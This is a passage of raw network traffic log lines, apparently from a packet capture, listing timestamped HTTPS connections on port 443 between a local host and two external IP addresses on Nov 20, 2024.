                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.276127100 CET44349796104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.277771950 CET49795443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.277793884 CET44349795104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.278687954 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.278716087 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.279158115 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.279997110 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.280072927 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.280149937 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.293596983 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.307327032 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.308634996 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.308634996 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.308649063 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.315336943 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.323359013 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.323698997 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.323949099 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.323983908 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.324702024 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.324717999 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.324717999 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.324736118 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.325378895 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.325396061 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.325772047 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.326261044 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.326335907 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.326874971 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.339282036 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.339977980 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.340087891 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.340131998 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.340154886 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.340261936 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.340271950 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.340344906 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.341398954 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.341577053 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.342020035 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.342092037 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.342163086 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.347991943 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.351222038 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.351279020 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.351289034 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.367095947 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.367163897 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.367201090 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.367214918 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.367335081 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.367376089 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.369843006 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.375075102 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.376068115 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.376375914 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.376394033 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.377511978 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.377584934 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.377964973 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378046036 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378127098 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378133059 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378179073 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378222942 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378237009 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378246069 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.378463030 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.383249998 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.383306026 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.383317947 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.383335114 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.383449078 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.384521008 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.384547949 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.396152020 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.402216911 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.402551889 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.402575970 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.409631014 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.409842014 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.409857988 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.416961908 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.418804884 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.418822050 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.427026987 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.427789927 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.427840948 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.429780006 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.430068016 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.430083036 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.436002016 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.436012983 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.490329981 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.540766001 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.543442011 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.543502092 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.543519020 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.545053959 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.545166969 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.545176983 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.555425882 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.555480003 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.555490017 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.555617094 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.568731070 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.568746090 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.578408003 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.578428030 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.582408905 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.582426071 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.587456942 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.591928005 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.591957092 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.597214937 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.597235918 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.600291967 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.600424051 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.600436926 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.600511074 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.610059977 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.610165119 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.619029999 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.619100094 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.620666981 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.620738983 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.620769978 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.620801926 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.620893955 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.621593952 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.623650074 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.627104044 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630002022 CET49799443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630032063 CET44349799104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630419970 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630424976 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630511045 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630553007 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.630651951 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.632363081 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.632461071 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.632503986 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.632559061 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.632595062 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.632702112 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.633744955 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.634398937 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.634588003 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.640369892 CET49800443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.640398026 CET44349800104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.645071983 CET49798443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.645090103 CET44349798104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.655678034 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.655786991 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.655955076 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.656855106 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.656974077 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.658015013 CET49802443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.658034086 CET44349802104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.662473917 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.662511110 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.663722038 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.663763046 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.664969921 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.665016890 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.666785955 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.666795015 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.669492006 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.669493914 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.669897079 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.669945002 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.670129061 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.670710087 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.670799017 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.670938015 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.672038078 CET49801443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.672060013 CET44349801104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674474001 CET49818443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674493074 CET44349818104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674710035 CET49817443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674726009 CET44349817104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674750090 CET49816443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674761057 CET44349816104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674877882 CET49815443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.674891949 CET44349815104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.675299883 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.678515911 CET49797443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.678534985 CET44349797104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.692255020 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.692333937 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.692414045 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.704996109 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.710259914 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.710345030 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.712961912 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.713052034 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.713104963 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.716263056 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.716285944 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.719531059 CET49803443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.719547987 CET44349803104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.738719940 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.740508080 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.742047071 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.742214918 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.742423058 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.742455959 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.742536068 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.746191978 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.746226072 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.746265888 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.746287107 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.747734070 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.751065969 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.759623051 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.761389971 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.761413097 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.761532068 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.761548042 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.763307095 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.764990091 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.767682076 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.767693043 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.767719984 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.767726898 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.768373966 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.769766092 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.769843102 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.769886017 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.770073891 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.771696091 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.771723986 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.774677038 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.777659893 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.779917955 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.780025959 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.782869101 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.783050060 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.783051968 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.783071995 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.783080101 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.783792019 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.788460016 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.789450884 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.791827917 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.791837931 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.791867018 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.792148113 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.793102026 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.793102980 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.793112993 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.795306921 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.797553062 CET49805443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.797571898 CET44349805104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.798247099 CET49808443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.798278093 CET44349808104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.806145906 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.806158066 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.806353092 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.806543112 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.806550026 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.811630964 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.812011003 CET49794443192.168.2.12104.16.102.112
